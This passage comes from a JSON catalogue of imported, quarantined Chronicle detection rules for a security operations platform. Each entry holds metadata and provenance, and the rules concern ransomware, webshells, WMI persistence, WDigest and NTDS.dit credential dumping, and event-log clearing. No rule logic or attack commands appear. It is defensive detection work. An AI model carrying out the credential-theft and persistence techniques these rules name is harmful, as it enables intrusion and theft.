"verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wannacry-ransomware-via-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wannacry_ransomware_via_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wannacry_ransomware_via_sysmon.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group", "type": "detection", "name": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "description": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wastedlocker_a_new_ransomware_variant_developed_by_the_evil_corp_group.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-credential-dumping", "type": "detection", "name": "wastedlocker_ransomware_hunting_credential_dumping", "description": "wastedlocker_ransomware_hunting_credential_dumping", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-credential-dumping.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_credential_dumping", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__credential_dumping.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-defense-evasion", "type": "detection", "name": "wastedlocker_ransomware_hunting_defense_evasion", "description": "wastedlocker_ransomware_hunting_defense_evasion", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-defense-evasion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_defense_evasion", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__defense_evasion.yaral" } }, { "id": "chronicle-detection-rules-wastedlocker-ransomware-hunting-initial-access-and-compromise", "type": "detection", "name": "wastedlocker_ransomware_hunting_initial_access_and_compromise", "description": "wastedlocker_ransomware_hunting_initial_access_and_compromise", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wastedlocker-ransomware-hunting-initial-access-and-compromise.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wastedlocker_ransomware_hunting_initial_access_and_compromise", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/wastedlocker_ransomware_hunting__initial_access_and_compromise.yaral" } }, { "id": "chronicle-detection-rules-wdigest-enable-uselogoncredential", "type": "detection", "name": "wdigest_enable_uselogoncredential", "description": "wdigest_enable_uselogoncredential", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wdigest-enable-uselogoncredential.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wdigest_enable_uselogoncredential", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/wdigest_enable_uselogoncredential.yaral" } }, { "id": "chronicle-detection-rules-webshell-detection-with-command-line-keywords", "type": "detection", "name": "webshell_detection_with_command_line_keywords", "description": "webshell_detection_with_command_line_keywords", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/webshell-detection-with-command-line-keywords.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "webshell_detection_with_command_line_keywords", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/webshell_detection_with_command_line_keywords.yaral" } }, { "id": "chronicle-detection-rules-webshell-detection-with-sysmon-logs", "type": "detection", "name": "webshell_detection_with_sysmon_logs", "description": "webshell_detection_with_sysmon_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/webshell-detection-with-sysmon-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "webshell_detection_with_sysmon_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/webshell_detection_with_sysmon_logs.yaral" } }, { "id": "chronicle-detection-rules-whoami-execution", "type": "detection", "name": "whoami_execution", "description": "whoami_execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whoami-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whoami_execution", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/whoami_execution_part_1.yaral" } }, { "id": "chronicle-detection-rules-whoami-execution-part-1", "type": "detection", "name": "whoami_execution_part_1", "description": "whoami_execution_part_1", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whoami-execution-part-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whoami_execution_part_1", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/whoami_execution_part_2.yaral" } }, { "id": "chronicle-detection-rules-whois-dns-query-to-typosquatting-domain", "type": "detection", "name": "whois_dns_query_to_typosquatting_domain", "description": "whois_dns_query_to_typosquatting_domain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-dns-query-to-typosquatting-domain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_dns_query_to_typosquatting_domain", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_dns_query_to_typosquatting_domain.yaral" } }, { "id": "chronicle-detection-rules-whois-expired-domain-accessed", "type": "detection", "name": "whois_expired_domain_accessed", "description": "whois_expired_domain_accessed", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-expired-domain-accessed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_expired_domain_accessed", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_expired_domain_accessed.yaral" } }, { "id": "chronicle-detection-rules-whois-expired-domain-executable-downloaded", "type": "detection", "name": "whois_expired_domain_executable_downloaded", "description": "whois_expired_domain_executable_downloaded", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-expired-domain-executable-downloaded.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_expired_domain_executable_downloaded", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_expired_domain_executable_downloaded.yaral" } }, { "id": "chronicle-detection-rules-whois-recently-created-domain-access", "type": "detection", "name": "whois_recently_created_domain_access", "description": "whois_recently_created_domain_access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/whois-recently-created-domain-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "whois_recently_created_domain_access", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/threat_intel/whois_recently_created_domain_access.yaral" } }, { "id": "chronicle-detection-rules-win-pua-detection-of-uncommon-rmm", "type": "detection", "name": "win_pua_detection_of_uncommon_rmm", "description": "win_pua_detection_of_uncommon_rmm", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-pua-detection-of-uncommon-rmm.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_pua_detection_of_uncommon_rmm", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_pua_detection_of_uncommon_rmm.yaral" } }, { "id": "chronicle-detection-rules-win-repeatedauthfailure-thensuccess-t1110-001", "type": "detection", "name": "win_repeatedAuthFailure_thenSuccess_T1110_001", "description": "win_repeatedAuthFailure_thenSuccess_T1110_001", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-repeatedauthfailure-thensuccess-t1110-001.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_repeatedAuthFailure_thenSuccess_T1110_001", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_repeatedAuthFailure_thenSuccess_T1110_001.yaral" } }, { "id": "chronicle-detection-rules-win-repeatedauthfailure-thensuccess-t1110-001-user-asset-entity", "type": "detection", "name": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "description": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-repeatedauthfailure-thensuccess-t1110-001-user-asset-entity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_repeatedAuthFailure_thenSuccess_T1110_001_user_asset_entity.yaral" } }, { "id": "chronicle-detection-rules-win-short-term-account-use", "type": "detection", "name": "win_short_term_account_use", "description": "win_short_term_account_use", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-short-term-account-use.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_short_term_account_use", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_short_term_account_use.yaral" } }, { "id": "chronicle-detection-rules-win-susp-or-malicious-service-created", "type": "detection", "name": "win_susp_or_malicious_service_created", "description": "win_susp_or_malicious_service_created", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/win-susp-or-malicious-service-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "win_susp_or_malicious_service_created", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/win_susp_or_malicious_service_created.yaral" } }, { "id": "chronicle-detection-rules-windows-10-scheduled-task-sandboxescaper-0day", "type": "detection", "name": "windows_10_scheduled_task_sandboxescaper_0day", "description": "windows_10_scheduled_task_sandboxescaper_0day", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-10-scheduled-task-sandboxescaper-0day.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_10_scheduled_task_sandboxescaper_0day", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/windows_10_scheduled_task_sandboxescaper_0_day.yaral" } }, { "id": "chronicle-detection-rules-windows-event-log-cleared", "type": "detection", "name": "windows_event_log_cleared", "description": "windows_event_log_cleared", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-event-log-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_event_log_cleared", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/windows_event_log_cleared.yaral" } }, { "id": "chronicle-detection-rules-windows-powershell-user-agent", "type": "detection", "name": "windows_powershell_user_agent", "description": "windows_powershell_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-powershell-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_powershell_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/windows_powershell_user_agent.yaral" } }, { "id": "chronicle-detection-rules-windows-powershell-webdav-user-agent", "type": "detection", "name": "windows_powershell_webdav_user_agent", "description": "windows_powershell_webdav_user_agent", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-powershell-webdav-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_powershell_webdav_user_agent", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/windows_powershell_webdav_user_agent.yaral" } }, { "id": "chronicle-detection-rules-windows-shell-spawning-suspicious-program", "type": "detection", "name": "windows_shell_spawning_suspicious_program", "description": "windows_shell_spawning_suspicious_program", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/windows-shell-spawning-suspicious-program.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "windows_shell_spawning_suspicious_program", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/windows_shell_spawning_suspicious_program.yaral" } }, { "id": "chronicle-detection-rules-winrm-configuration-detector", "type": "detection", "name": "winrm_configuration_detector", "description": "winrm_configuration_detector", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/winrm-configuration-detector.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "winrm_configuration_detector", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/winrm_configuration_detector.yaral" } }, { "id": "chronicle-detection-rules-winrm-session-created-sysmon-behavior", "type": "detection", "name": "winrm_session_created_sysmon_behavior", "description": "winrm_session_created_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/winrm-session-created-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "winrm_session_created_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/winrm_session_created__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-wmi-event-subscription", "type": "detection", "name": "wmi_event_subscription", "description": "wmi_event_subscription", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_event_subscription", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wmi_event_subscription.yaral" } }, { "id": "chronicle-detection-rules-wmi-persistence-command-line-event-consumer", "type": "detection", "name": "wmi_persistence__command_line_event_consumer", "description": "wmi_persistence__command_line_event_consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-persistence-command-line-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_persistence__command_line_event_consumer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/wmi_persistence___command_line_event_consumer.yaral" } }, { "id": "chronicle-detection-rules-wmi-persistence-script-event-consumer", "type": "detection", "name": "wmi_persistence__script_event_consumer", "description": "wmi_persistence__script_event_consumer", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-persistence-script-event-consumer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_persistence__script_event_consumer", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wmi_persistence___script_event_consumer.yaral" } }, { "id": "chronicle-detection-rules-wmi-spawning-windows-powershell", "type": "detection", "name": "wmi_spawning_windows_powershell", "description": "wmi_spawning_windows_powershell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmi-spawning-windows-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmi_spawning_windows_powershell", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/wmi_spawning_windows_powershell.yaral" } }, { "id": "chronicle-detection-rules-wmic-ntds-dit-t1003-003-cisa-report", "type": "detection", "name": "wmic_ntds_dit_T1003_003_cisa_report", "description": "wmic_ntds_dit_T1003_003_cisa_report", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmic-ntds-dit-t1003-003-cisa-report.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmic_ntds_dit_T1003_003_cisa_report", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/wmic_ntds_dit_T1003_003_cisa_report.yaral" } }, { "id": "chronicle-detection-rules-wmiexec-vbs-script", "type": "detection", "name": "wmiexec_vbs_script", "description": "wmiexec_vbs_script", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wmiexec-vbs-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wmiexec_vbs_script", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/wmiexec_vbs_script.yaral" } }, { "id": "chronicle-detection-rules-wsfjsejsvbavbe-file-execution-sysmon", "type": "detection", "name": "wsfjsejsvbavbe_file_execution_sysmon", "description": "wsfjsejsvbavbe_file_execution_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/wsfjsejsvbavbe-file-execution-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "wsfjsejsvbavbe_file_execution_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/wsf_jse_js_vba_vbe_file_execution__sysmon.yaral" } }, { "id": "chronicle-detection-rules-yispecter-malware-detection", "type": "detection", "name": "yispecter_malware_detection", "description": "yispecter_malware_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/yispecter-malware-detection.yaml", "quarantine_reason": "imported rule; upstream query 